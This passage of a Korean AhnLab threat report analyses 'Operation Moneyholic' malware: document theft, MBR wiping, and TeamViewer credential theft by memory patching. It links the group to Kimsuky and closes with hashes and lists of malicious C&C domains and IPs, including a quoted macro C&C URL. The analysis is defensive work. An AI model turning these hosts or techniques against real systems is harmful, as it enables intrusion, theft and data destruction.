이런정보를이용해보안업체나사법기관은공격자를추적하거나프로파일링한다. 그러나오퍼레이션머니홀릭의사례처럼공격자가감염 PC를활용하면자신의존재를숨길수있기때문에추적을따돌리고프로파일링을방해할수있다. (2) 문서파일수집감염 PC에이동식디스크가연결되어있다면백도어를통해 ghost.exe 를유포한것으로보인다. 해당파일은드라이브타입이이동식디스크일경우특정확장자 (.jpg,.png,.doc,.docx,.xls,.xlsx,.pdf,.hwp,.txt,.zip) 를가진파일을검색한후특정폴더 (%Public%\Documents\[ 랜덤폴더명 ]) 에수집한다. AhnLab, Inc. All rights reserved. 37

[ 그림 48] 수집대상확장자및수집파일 ( 한글 ) 예시 그러나 ghost.exe 는 C&C 와통신하는기능이없으며, 따라서수집한파일은실행중인백도어를통해유출 한것으로추정된다. (3) MBR(Master Boot Record) 파괴 백도어 TiWorker.exe 에의해다운로드된 Bang.exe 는감염 PC 의 HDD 0 번째섹터에위치한 MBR 의일부영역 을 0 으로덮어쓴후 shutdown 명령을사용하여감염 PC 를종료한다. [ 그림 49] MBR 파괴기능 AhnLab, Inc. All rights reserved. 38

[ 그림 50] 에서붉은색으로표시된부분이 Bang.exe 의실행전과후를비교한것으로, 해당영역에감염 PC 의 파티션테이블정보가존재한다. [ 그림 50] 정상 MBR 과파괴된 MBR 비교 Bang.exe 에의해감염 PC 의파티션테이블정보가손상되었기때문에 shutdown 명령으로전원이꺼진 (OFF) PC 를다시부팅하면 [ 그림 51] 과같이 Invalid partition table 이라는에러메시지가나타나고부팅이되지 않는다. [ 그림 51] 부팅시나타나는에러메시지 (4) 팀뷰어계정정보탈취 메모리패치방식을사용해서팀뷰어계정정보를탈취시도하는악성코드도유포됐으며, 해당악성코드의 동작과정은다음과같다. AhnLab, Inc. All rights reserved. 39

[ 그림 52] RCP.exe 의동작과정 ❶ RCP.exe 에 3.6버전의팀뷰어와악성코드가리소스형태로존재 ❷ RCP.exe 가 mfc100d.dll 을 lcass.exe 에인젝션 ❸ 인젝션된 mfc100d.dll 은 lcass.exe, 즉팀뷰어에서아이디 / 비밀번호가처리되는코드영역을메모리패치 ❹ mfc100d.dll 은메모리패치를통해획득한팀뷰어의아이디 / 비밀번호를 RCP_Info(Jerry).log 에기록 [ 그림 53] 은위의과정중위의과정중 ❸, ❹ 번에해당하는내용이다. AhnLab, Inc. All rights reserved. 40

[ 그림 53] 팀뷰어아이디획득을위한메모리패치과정 ❶ 팀뷰어에서메모리패치주소를획득하기위한거리계산 ❷ 팀뷰어에서아이디를처리하는부분을메모리패치하는코드 ❸ 메모리패치후팀뷰어아이디획득시 mfc1000d.dll의파일기록기능으로분기하는코드로획득한팀뷰어아이디는 RCP_Info(Jerry).log 에기록 그러나팀뷰어홈페이지에서최신버전을다운로드및설치한후 mfc1000d.dll 를강제로로딩시켜테스트한결과, 팀뷰어계정정보를획득할수없었다. 또한 mfc1000d.dll 의잘못된메모리패치로인해실행중인팀뷰어가종료됐다. 즉, 오퍼레이션머니홀릭조직이테스트한팀뷰어버전은 3.6버전으로, 해당버전에서는팀뷰어계정정보를탈취할수있지만최신버전에서는탈취할수없다는실패한다는의미다. 한편, 오퍼레이션머니홀릭은백도어를통해키로거, 마이너, 악성 Autoit 스크립트, 닷넷백도어등다양한악성코드를테스트목적으로유포했다. AhnLab, Inc. All rights reserved. 41

악성코드프로파일링 악성코드프로파일링은악성코드의변화를추적하고관리함으로써향후발생할수있는사이버공격을예측하고대비하는데도움을주는작업으로, 악성코드분석및대응만큼반드시필요하다. 그러나악성코드분석및대응과달리악성코드프로파일링은단기간에완료할수있는작업이아니므로긴호흡으로장기적인관점에서진행해야한다. 장기간에걸쳐악성코드의변화를추적하다보면특정국가의지원을받는공격조직과관련된경우를발견하게되는경우도있는데, 그관련성을밝혀내는것또한악성코드프로파일링의중요한역할이라할수있다. 그러나공격자들은악성코드프로파일링을방해하거나혼란을주기위해위장기법 (False Flag) 이나공개된해킹툴사용, VPN 경유등다양한방법을동원하고있다. 따라서악성코드프로파일링은다수의가능성을열어두고신중하게접근하면서공격의실체에근접할수있는가능성을높이는작업이다. 한편, 안랩은 2018 년 2 월부터특정한악성코드의변화를지속적으로추적하고분석한결과, 일련의공격 사례가특정국가의지원을받는공격조직인 Kimsuky 조직을연상시키는다수의근거를확인했다. 1. 악성코드비교 2018 년 2 월, 앞서살펴봤던감염 PC 1 과유사한감염패턴을가진감염 PC 2 를발견했다. 감염 PC2 에서 userrepairkey_x86.exe 등감염 PC 1 의 Utilman.exe 와동일한기능을가진다수의악성코드가확인됐다. 일자진단경로파일명 2018.02.10 C:\Windows\System32\ipnet.dll ipnet.dll 2018.02.10 C:\Windows\System32\ntwdblib.dll NTWDBLIB.dll 2018.02.20 C:\Windows\Temp\userrepairkey_x86.exe UserRepairKey_x86.exe 2018.03.06 C:\Users\***\Downloads\111\dnscacheupdate.dll DnscacheUpdate.dll 2018.03.06 C:\Users\***\Downloads\111\ipcheck.dll IPCheck.dll [ 표 14] 감염 PC 2 의진단정보 AhnLab, Inc. All rights reserved. 42

이들두 PC 에서발견된악성코드의 RDP 계정추가기능을비교한결과, [ 그림 54] 와같이비밀번호만다를 뿐동일한것으로나타났다. [ 그림 54] RDP 계정추가기능비교 또한 [ 그림 55] 와같이 RDP 계정이 ASPNET 으로동일하며, 계정의설명문구도유사했다. [ 그림 55] 파일별 RDP 계정및설명문구 AhnLab, Inc. All rights reserved. 43

감염 PC 1 의 Utilman.exe 는지난 2017 년 2 월에또다른 PC 에서발견된이력이있으며, 해당 PC( 이하감염 PC 3) 에서추가로발견된키로거는 Kimsuky 조직이 2013 년에사용한키로거와동일했다 ([ 그림 56] 참고 ). [ 그림 56] 2013 년 Kimsuky 조직의키로거와 2017 년감염 PC 3 의키로거 2017년 8월부터 Kimsuky 조직이제작한악성코드에간헐적으로감염됐던 PC( 이하감염 PC 4) 에서도감염 PC 1의 Utilman.exe와유사한기능을가진악성코드를발견했다. [ 그림 57] 은감염 PC 1의 Utilman.exe와감염 PC 4의 dnsadmin.exe를비교한것으로, 코드와감염 PC에추가된 RDP 계정은다르지만동일한비밀번호 (waldo1215!) 를사용했음을알수있다. 또한감염 PC 1의 Utilman.exe에존재하는 dnsadmin 이라는문자열이감염 PC 4의 EXEJINBO.exe에도존재한다. 해당문자열은 C&C 서버와의통신에사용된다. AhnLab, Inc. All rights reserved. 44

[ 그림 57] 동일한비밀번호와문자열사용 N o Type 파일명 팀뷰어버 전 PDB 1 MoneyHol ic coinstager.e xe 5.0.9104.0 c:\teamviewer5_release\teamviewer\release\teamvie wer.pdb 2 MoneyHol ic lcass.exe 3.6.5524.0 c:\teamviewer_3.6\teamviewer\release\teamviewer.p db 3 Kimsuky netsvcs.exe 5.0.9104.0 c:\teamviewer5_release\teamviewer\release\teamvie wer.pdb 4 Kimsuky MsMpQhp.e xe 3.0.3612.0 c:\teamviewer\teamviewer\release\teamviewer.pdb 5 Kimsuky spl.exe 5.0.9104.0 6 Kimsuky xpsp2.exe 5.0.9104.0 c:\teamviewer5_release\teamviewer\release\teamvie wer.pdb c:\teamviewer5_release\teamviewer\release\teamvie wer.pdb [ 표 15] 팀뷰어버전및 PDB 정보 AhnLab, Inc. All rights reserved. 45

[ 표 15] 는팀뷰어의파일버전및 PDB 정보를정리한것으로, 그내용을종합하면크게두가지로요약할수있다. 첫째, [ 표 15] 의 1번, 3번, 5번, 6번의팀뷰어버전과 PDB 정보가동일하며 2번과 4번팀뷰어의 PDB 정보도유사하다. 둘째, 1번, 3번, 5번, 6번의팀뷰어상세파일등록정보를확인해보면 [ 그림 57] 과같이 1번과 6 번팀뷰어의파일등록정보와일치한다. 3번과 4번도팀뷰어파일등록정보가일치한다. 물론, 1 번, 6 번과 3 번, 5 번을비교하면 ComapnyName 이나 InternalName 등다소의차이가보이지만, 전체 적으로유사한패턴의파일등록정보를갖고있음을알수있다. 이중에서 3 번, 5 번, 6 번팀뷰어는 Kimsuky 조직에서사용했다. [ 그림 58] 팀뷰어의파일등록정보비교 2019 년 5 월 24 일 VirusTotal 에업로드된 Huobi Research Weekly (Vol. 62) 2019.05.13-2019.05.19.doc 파일에 서도오퍼레이션머니홀릭과 Kimsuky 조직과의관련성을추정할수있는흔적이발견됐다. [ 그림 59] 의 20190502_01.doc 파일은오퍼레이션머니홀릭조직이유포한것이고, Huobi Research( 이하 AhnLab, Inc. All rights reserved. 46

생략 ).doc 파일은 Kimsuky 조직에서유포한악성파일이다. 이들두악성파일에포함된악성매크로를비교하면 [ 그림 59] 와같이매우유사함을확인할수있다. 특히매크로영역에오퍼레이션머니홀릭조직에서사용한 C&C 서버주소인 surl = fighiting1013.org/2/ 가 Huobi Research.doc 파일에도동일하게존재하나주석처리되어있으며, 새로운 C&C 서버인 naoei3-tosma.96.lt 가추가됐다. [ 그림 59] 악성코드의악성매크로비교 [ 그림 60] 의등록정보에서볼수있는것처럼, 두악성코드를만든날짜 ( 및시간 ) 과만든이도동일하다. AhnLab, Inc. All rights reserved. 47

[ 그림 60] 악성코드의등록정보비교 Huobi Research.doc 파일과이파일이다운로드하는 1.dat 파일을 Kimsuky 조직이제작한것으로판단하는근 거는다음과같다. 첫째, 1.dat 는데이터파일처럼보이지만실제로는 DLL 파일이며, 같은달에발견된 Sway.dat 와코드가 동일함을확인했다. [ 그림 61] C&C 통신기능비교 둘째, Sway.dat 는 [ 그림 62] 의 Liryc.dat 에의해생성되는파일이다. Liryc.dat 는과거특정공격에서악성 한글파일이다운로드한 core.dll 과동일한악성코드로, core.dll 은안랩이 2019 년 2 월에공개한 Kimsuky 조직 관련 오퍼레이션카바코브라보고서 에설명되어있다. AhnLab, Inc. All rights reserved. 48

- [ 그림 62] 악성코드의문자열비교 이와같은근거를토대로 Huobi Research.doc 파일과해당파일이다운로드하는 1.dat 는 Kimsuky 조직이제 작한것으로판단할수있다. 2. 악성코드유포지와문자열 Jerry [ 표 16] 은 Kimsuky 조직이사용한악성코드유포지의일부로, 악성코드유포, 피싱메일발송, 감염 PC 로그 를저장하는용도로사용했다. IP URL 설명 156.67.222.184 no-vac.esy.es naver-mail-com.hol.es free-tell.esy.es finale-jack.esy.es embed-helper.esy.es 네이버피싱, 메일러존재네이버피싱 free-tell.esy.es/dl_ex1.png?fn= 파일명 finale-jack.esy.es/dl_ex1.png?fn= 파일명 Jerry계정의감염 PC로그존재 [ 표 16] Kimsuky 조직이사용한악성코드유포지 [ 표 16] 의 no-vac.esy.es 주소에는공격자가사용하는메일러가존재한다. 메일러에는 [ 그림 63] 과같이공 격목표의메일주소를입력하는텍스트영역과버튼이있다. 이를이용하여공격대상에게특정포털사 AhnLab, Inc. All rights reserved. 49

이트업체의메일로위장한피싱메일을발송할수있다. [ 그림 63] 피싱메일러동작과정 [ 그림 63] 의피싱메일발송이완료된후나타나는메시지에서 성과적으로발송되였습니다 라는표현을볼수 있다. 이는한국에서사용되지않는표현이다. 또한메일러를통해발송된메일에연결된피싱페이지에서도 Kimsuky 조직으로의심되는정황이확인됐다. [ 그림 64] 메일러를통해발송된피싱메일및피싱페이지 AhnLab, Inc. All rights reserved. 50

[ 그림 64] 의메일본문에포함된 비밀번호재확인 버튼을클릭하면피싱페이지에연결되는데, 이페이지의 도메인주소는국내유명포털사이트의주소 (naver.com) 와유사한 naverhelper.com 이다. 또다른도메인 embed-helper.esy.es 주소에서악성코드감염을통해업로드된시스템로그가확인됐다 ([ 그림 65]). [ 그림 65] embed-helper.esy.es 에업로드된감염 PC 로그 업로드된 3 개의파일명은 BASE64 로암호화된감염 PC 의 IP 와로그생성시간을조합한것으로, 복호화결과는 [ 표 17] 과같다. No BASE64 복호화전 BASE64 복호화후로그생성시간 IP Info 1 MTc1LjE2Ny4x******= 175.167.128.*** 2019-06-09-11-29-12-AM CN, Shenyang 2 MTc1LjE2Ny4xM******= 175.167.130.*** 2019-06-10-02-29-34-AM CN, Dalian 3 MTI0LjIxNy4yMDku****** 124.217.209.*** 2019-06-10-09-29-34-AM KR, 리눅스랩 [ 표 17] 감염 PC 로그의특징 [ 표 17] 의 1 번과 2 번은 Kimsuky 조직이자주사용하는 IP 대역이다. [ 그림 66] 은 Kimsuky 조직이 2017 년 에 C&C 로사용했던주소에서발견된감염 PC 의로그의일부로, IP 가 [ 표 17] 의 IP 와 B 클래스대역까지 동일하다. [ 그림 66] Kimsuky 조직이 2017 년에사용한 C&C 에업로드된감염 PC 정보 AhnLab, Inc. All rights reserved. 51

업로드된파일내부에는 [ 그림 67] 과같이폴더및파일목록, 프로세스목록, 네트워크정보등이기록되 어있으며, 공통적으로 jerry 라는문자열이존재한다. 해당문자열은 Kimsuky 조직이악성코드제작및테 스트에사용했던운영체제에로그인한아이디이다. [ 그림 67] 복호화결과및공통적으로존재하는 jerry 문자열 오퍼레이션머니홀릭조직이제작한악성코드의디버그메시지, PDB, 그리고 C&C 에저장되있던로그에도 동일한 Jerry 문자열이존재한다 ([ 그림 68]). AhnLab, Inc. All rights reserved. 52

[ 그림 68] RCP.exe 와 C&C 에존재하는 Jerry 3. 동일한 C&C, 두개의흔적 [ 그림 69] 의 main.php 는 2017 년 9 월에업로드된것으로, Kimsuky 조직이해당웹쉘을사용하는것으로판단 한근거는 [ 표 18] 과같다. [ 그림 69] 웹쉘이존재하는 C&C [ 표 18] 의접속 IP 는 Kimsuky 조직이악성코드진단및테스트시사용한 IP 로, jhj=34 라는인자값을사용 해웹쉘에접근한이력이있다. 인자값으로사용한 jhj 는 Kimsuky 조직의구성원중하나의이니셜로추 정된다. 접속일자접속 IP 접속국가접속 URL 2019.04.21 118.128.216.*** Korea, Republic of rentalcars***.amex***.net/main.php?jhj=34 [ 표 18] Kimsuky 조직이웹쉘에접근한이력 AhnLab, Inc. All rights reserved. 53

[ 그림 70] 2018 년 3 월악성코드유포이력 또한 Kimsuky 조직의메일러로추정되는 send.php 에접근한이력을발견했으며 ([ 표 19]), 이를통해공격자 가사용한메일러 star 3.0 을확보했다 ([ 그림 71]). 접속일자접속 IP 접속국가접속 URL 2019.04.05 221.150.255.*** Korea, Republic of Rentalcars***.amex***.net/send/send.php [ 표 19] Kimsuky 조직 ( 추정 ) 이메일러에접근한이력 [ 그림 71] 메일러 star 3.0 오퍼레이션머니홀릭조직과 Kimsuky 조직에서접근했던메일러의파일명과경로는아래와같이 host 이름 만다를뿐, 나머지는동일한것으로확인됐다. AhnLab, Inc. All rights reserved. 54

Kimsuky 조직의접근 URL: http://rentalcars***.amex***.net/send/send.php 오퍼레이션머니홀릭조직의접근 URL: http://amex***.amex***.net/send/send.php 또한, 오퍼레이션머니홀릭조직이실제로발송한메일의헤더를분석한결과, 다른 C&C 서버에서도 [ 그림 71] 과동일한구조를가진폴더와메일러를추가로발견했다 ([ 그림 72]). [ 그림 72] 메일헤더를통해확인된 C&C 와메일러 앞서오퍼레이션머니홀릭조직이윈도우운영체제의 PC뿐만아니라안드로이드스마트폰을공격대상에포함했던것을확인한바있다. [ 그림 72] 의메일러상단에표기된 victory 라는문자열은악성앱이통신하는 C&C에존재하는웹쉘의로그인비밀번호로, 이를이용해로그인하면 [ 그림 73] 과같은웹쉘 config.php 가존재한다. [ 그림 73] 웹쉘로그인후 AhnLab, Inc. All rights reserved. 55

웹쉘을통해 C&C 서버의폴더를탐색한결과, [ 그림 74] 와같이악성앱에감염된안드로이드스마트폰 으로전송할명령 (get_clipboard) 이 txt 형태로저장되어있는것을확인했다. 또다른폴더에는일부피해자 들의스마트폰에서수집한것으로보이는정보가존재했다. [ 그림 74] C&C 서버에존재하는로그 4. 문자열 Jhon 또는 John 감염 PC 1 의진단정보에 John 이라는문자열이존재한다. 일자진단경로진단명 2018.07.23 C:\Users\John\Desktop\spoolsve.exe Trojan/Win32.Agent.R232183 2018.07.20 C:\Users\John\Desktop\NTWDBLIB.dll Trojan/Win64.Agent 2018.07.19 C:\Users\John\Documents\drv.dll Trojan/Win32.Agent.R232080 2018.07.19 C:\Users\John\Documents\spoolsve.vmp.exe Trojan/Win32.Agent.R231849 [ 표 20] 감염 PC 1 의진단정보 John 이라는문자열은 Kimsuky 조직이 2014 년한수원공격에서심리전목적으로사용했던트위터와악성 코드제작에사용했던계정이다. AhnLab, Inc. All rights reserved. 56

[ 그림 75] Kimsuky 조직이사용한 John 문자열및 2014 년문서 John 이라는문자열은일반적인계정에흔히사용될수있는문자열인만큼이것만으로공격조직을특정할수는없다. 그러나 [ 표 20] 의문자열 John 과 [ 표 10] 의문자열 Jhon 을연관지어생각해볼필요도있다. 두문자열의 o와 h의순서가다른것은오타에의한것일가능성을배제할수없다. 키보드상에서 h, j, n 이모두오른쪽에위치하고있으며, 서로매우근접하게자리하고있기때문에 John을입력하려다 Jhon로잘못입력하는경우는흔하다. 또한안랩은해당앱을추적하는과정에서동일한패키지명과기능을갖고있는다른앱을확인했다. 추가 로확인된앱은암호화폐거래소인빗썸 (Bithumb) 으로위장하고있었다 (Bithubmprotect.apk). 해당앱의악 성행위는동일하며, C&C 서버주소의패턴도유사하다. AhnLab, Inc. All rights reserved. 57

[ 그림 76] BithumbProtect.apk 의 C&C 서버주소 이들앱이사용하는 C&C 서버의패턴에서도유사성이확인되었다. 항목 [ 그림 40] 의악성앱 BithumbProtect.apk Package Name app.project.appcheck C&C 193.148.16.45/manager/up.php manage.app-wallet.com/up.php [ 표 21] 앱비교정보 C&C 서버로사용한 app-wallet.com 의도메인등록정보는 [ 표 22] 와같으며, 대표적인암호화폐인비트코 인 (bitcoin) 의문자열로이메일계정을등록했다. 항목 app-wallet.com rneail.com Name Annie Cho Annie Cho Email bitcoin025@hanmail.net bitcoin018@hanmail.net [ 표 22] 리버스도메인등록정보 안랩은도메인등록자를추적하던과정에서도메인등록자 Annie Cho 가등록한도메인 rneail.com 외에 다수의도메인을확인했다. AhnLab, Inc. All rights reserved. 58

항목 grnaeil.com rnaii.com Name Dongil Song Dongil Song Email bitcoin024@hanmail.net bitcoin024@hanmail.net [ 표 23] bitcoin024@hanmail.net 등록정보 구글의지메일인 gmail.com 과유사한 grnaeil.com 도메인은 160.202.162.78 로연결되는데, 이는 2019 년 5 월에 유포된 TiWorker.exe 의 C&C 주소 (160.202.162.78) 와동일하다. [ 그림 77] 2019 년 5 월에유포된 TiWorker.exe 또한같은대역대인 160.202.162.79 에네이버와유사한도메인인 nid.helpnaver.com 이연결되는것을확 인했다. 해당도메인의등록정보를살펴보면 Jhon 과유사한 Jhone 문자열을확인할수있다. 항목 nidhelpnaver.com helpnaver.com Name Jane Jhone Aji 917 Email snow8949@hotmail.com tiger199392@daum.net [ 표 24] 리버스도메인등록정보 또한같은시기에발생한공격인 APT Campaign Smoke Screen targeting to Korea and US( 이스트시큐리티, https://blog.alyac.co.kr/2243) 에서동일한공격자정보인 snow8949@hotmail.com, Aji 917, tiger199392 를 확인할수있다. AhnLab, Inc. All rights reserved. 59

결론 2018년 2월부터 2019년 8월현재까지오퍼레이션머니홀릭조직이사용한악성코드를프로파일링한결과, 해당조직의악성코드제작방식이나악성코드동작방식은 Kimsuky 조직과는차이가있다. 그러나지금까지살펴본바와같이악성코드, 유포지, C&C 등다양한근거를토대로오퍼레이션머니홀릭조직과 Kimsuky 조직이밀접하게관련되어있는것으로판단할수있다 한편, 오퍼레이션머니홀릭조직에서사용한악성코드의파일명으로공격대상이나목적을짐작할수있다. 계약서확인건.doc 파일은직접적으로금전적이득을노린것같지않지만, 해당파일이탈취한공격대상 의정보를분석한결과, 결국암호화폐를포함한금전적인이득을취하려는목적이확인되었다. 본보고서에서오퍼레이션머니홀릭조직과다른조직과의연관성에대해좀더명확하게밝힐수없는것은아쉽지만, 이는단기간에이루어지기힘든작업이다. 향후안랩은지속적으로오퍼레이션머니홀릭조직을꾸준히추적하고프로파일링할계획이며, 이를통해확인된내용은추가보고서를통해공개할계획이다. 또한그과정에서국가기관및보안업체들과협업하여해당조직의실체를밝히는데노력할것이다. AhnLab, Inc. All rights reserved. 60

안랩제품대응현황 안랩 V3 제품군에서는오퍼레이션머니홀릭과관련된악성코드를다음과같은진단명으로탐지하고있 다. 파일명 MD5 V3 진단정보 a77566ec1317117d5fe0eb4d647c6ac0 V3:Trojan/Win32.Agent (2018.05.29.08) DnscacheUpdate.dll 1d9668a4d59b19d50f93481f65ca4e46 V3:Trojan/Win32.Agent (2018.05.29.09) 068a6acb7d4ec0d146497e37fccca210 V3:Trojan/Win32.Agent (2018.07.16.03) 0c08c15f4becc21fab5ee3a0871f2c39 V3:Trojan/Win32.Rdpwrap (2019.01.23.00) RDP Warapper 4a86f5909441914ff04f2a16bb379353 034db0b2bdd0d5df1de9da0b108d0f9 6 a553bd68ee74e920eb7c4f068ce35706 V3:Win-Trojan/Craydoor.Exp (2018.02.20.09) V3:Unwanted/Win32.RemoteAdmin (2018.03.20.07) V3:Trojan/Win32.Rdpwrap (2018.11.26.07) b2fcef57d62ca5075e62975aee272137 V3:Win-Trojan/Alisa.Exp (2018.02.20.09) d32f6ed7958c07698d3f51e7268f1fa4 V3:Unwanted/Win32.Rdpwrap (2018.11.16.05) Ghost.exe 46874dfa70336308dd69248ae13cc19 d V3:Trojan/Win32.Agent (2018.07.20.03) spoolsve.exe 76c8da4147b08e902809d1e80d96fbb 4 V3:Trojan/Win32.Agent (2018.07.18.00) f6ebbd988d6f68749343c6ede200ce36 V3:Trojan/Win32.Agent (2018.05.29.06) Utilman.exe 1d6ce0778cabecea9ac6b985435b268 b V3:Trojan/Win32.NsSpy (2017.09.13.09) AhnLab, Inc. All rights reserved. 61

userrepairkey_x86.exe 9cb536f3af8a9d52937dddac43d3de99 V3:Trojan/Win32.Agent (2018.05.29.06) sqldebuger.exe dnsadmin.exe 96cc6500169b047e5ab2565f91e1eaaa 1d6ce0778cabecea9ac6b985435b268 b V3:HackTool/Win32.Agent (2018.07.18.00) V3:Trojan/Win32.NsSpy (2017.09.13.09) RCP.exe 51e161503b6cd3d9f854cffcbfcd4e77 V3:Backdoor/Win32.RemoteControl (2018.09.14.00) lcass.exe 2827cc82c23cc054944930d331c7475f V3:Backdoor/Win32.RemoteControl (2018.09.14.00) mfc100d.dll ac7f2afa1934eb9178de53ec1c50d6aa V3:Trojan/Win32.HackTool (2018.09.14.00) coinstager.exe a25811b24b7f27a486c05c0a09ad992d V3:Trojan/Win32.XwDoor (2018.05.30.00) 20190502_01.doc FD0421941F3544CBA96BA6E4A7D954 90 V3:W97M/Downloader (2019.08.14.07) Huobi Research Weekly (Vol.62) 2019.05.13-2019.05.19.doc 715051f5028dc793e06b20b4048f33a6 V3:DOC/Downloader (2019.06.22.00) 1.dat C4379FB6A0041C7546835EDA4FC5EA 49 V3:Trojan/Win32.Infostealer (2019.05.31.00) Sway.dat b12fa22d02fda312eaf31babe2d719e9 V3:Trojan/Win32.Infostealer (2019.07.19.04) core.dll 865138cf59970c8c871f085ce18fcb1b V3:Backdoor/Win32.Akdoor (2017.06.02.05) Lyric.dat 109a42f52b68b1af7ec1ac3d5cb22cfd V3:Backdoor/Win32.Akdoor (2019.07.19.04) 76043093.exe 5259e9a18754703fdd47d2c9ade0e35f V3:Trojan/Win32.Agent (2018.04.18.00) Google Update.exe D94F7A8E6B5D7FC239690A7E65EC17 V3:Trojan/Win32.XwDoor AhnLab, Inc. All rights reserved. 62

78 (2013.09.12.04) 1-EXEJINBO.exe netsvcs.exe 2bd4380c9aabe58812c9088d40bf127 d ab73b1395938c48d62b7eeb5c9f3409 d V3:Trojan/Win32.Akdoor (2017.12.22.07) V3:Win-Trojan/Agent.5248512 (2013.09.12.00) spl.exe b02f3881321f0912b2ae3f27498c448f V3:Trojan/Win32.XwDoor (2014.01.28.03) xpsp2.exe 11fc4829c2fff9fb240acbd71c60fc67 V3:Dropper/Win32.TeamRat (2014.04.10.01) 1.scr 37c6326f3cf3542e52439a66150ba278 V3:Trojan/Win32.Injector (2014.06.03.04) ipnet.dll f05af1304c8fb427b5f073f2e0154c0e V3:Trojan/Win32.Agent (2014.06.05.03) 시멘트 석.doc 제품지표분 123CC66864109F3E952A31ADD0776E 3E V3:RTF/Exploit (2019.03.13.00) 거래내역.doc 8fc875be2f4b6be1fd31ef6a99d0be25 V3:RTF/Exploit (2018.11.14.00) 컨텐츠공급계약서초 안.doc 067A81CFFDC9FC18A6F9D7C746D0D 3E5 V3:W97M/Downloader (2019.08.14.08) BTS 자료.zip_ycy.doc svchost.exe kmrin.exe A2B2B70DFB4C34D376E71BB5AD941 73B 7ABF91E1D313126F0A0E77074E50586 A 377395C4740A5F648A8064245D9F80 C8 V3:VBA/Amabot.S2 (2019.08.08.00) V3:Trojan/Win32.Amabot (2019.04.03.00) V3:Trojan/Win32.Amabot (2019.04.03.00) lig.exe spolsve.exe bang.exe ecfc59216dd787dff53cf2e4b7d0f832 e1dd36e8d4091db216067d4e813612c 9 7b8c66707da8bfecd4d334dd7c45b23 6 V3:Win-Trojan/Craydoor.Exp (2019.03.09.00) V3:Trojan/Win32.Amabot (2019.04.02.06) V3:Trojan/Win32.DiskWriter (2019.08.15.00) AhnLab, Inc. All rights reserved. 63

DaumProtect.apk a3f297208d69bd597e7235cad7faefaf MO: (2019.03.27.02) Android-Trojan/Cannie NaverProtect.apk 1793f7bddf6be0129fe8af7488dd384f MO: (2019.03.27.02) Android-Trojan/Cannie KakaoTalk.apk 6c290d6ddbe317844a4dccdc2259c6c 1 MO: (2019.03.27.02) Android-Trojan/Cannie Bithubmprotect.apk c1063cfa402e64882d41f88ada87c8d1 MO: (2019.03.18.03) Android-Trojan/Cannie 사업계획서.hwp 한울 1,2 호기설계 변경사항.hwp B5B6E93AB27CEC75F07AF2A3A6A409 26 54783422CFD7029A26A3F3F5E9087D 8A V3:HWP/Exploit (2014.12.10.02) V3:HWP/Exploit (2014.12.10.06) WXB 코인배정내용 - 송부용.xlsx{ 공백 }.exe 6f5f22753af837433267dcd76bf316ea V3:Trojan/Win64.Agent (2018.05.29.08) ***** 조직 3 차 -5 차 마지막 BCOT 구매리 스트및수량계산확 인.hwp.exe 45fa564f2ccea45ff26099cb3737d654 V3:Trojan/Win32.Agent (2018.05.28.05) [ 표 25] V3 제품대응현황 IoC (Indicators of Compromise) 1. MD5 위의 [ 표 25] 참고 AhnLab, Inc. All rights reserved. 64

2. C&C 및유포지 signetsys.com orion.kim 881.000webhostapp.com 071790.000webhostapp.com 71790.000webhostapp.com attach10131.1apps.com attach10132.1apps.com vnik.000webhostapp.com no-vac.esy.es naver-mail-com.hol.es free-tell.esy.es finale-jack.esy.es embed-helper.esy.es naoei3-tosma.96.lt 8877.1apps.com downok1013.1apps.com rainbow1013.1apps.com gotomyhouse1013.1apps.com indiana1014.1apps.com alabamaok0515.1apps.com fighiting1013.org rainbow.webrnail.com gmaildown.1apps.com cert-us.com AhnLab, Inc. All rights reserved. 65

u811238542.hostingerapp.com snop.webrnail.com mklawyer.maru.net result-viewer.com www.karachi-tan.com www.downloader-hanmail.net mytut.net/snop/ snop.mytut.net naver.attach-download.com daum.attach-download.com 193.148.16.45 217.197.161.78 188.241.39.220 62.133.58.60 194.59.164.14 160.202.162.78 5.252.198.93 104.243.41.186 147.46.46.140 188.241.39.10 103.249.31.170 103.249.31.159 61.14.210.72 61.14.211.140 111.90.138.41 AhnLab, Inc. All rights reserved. 66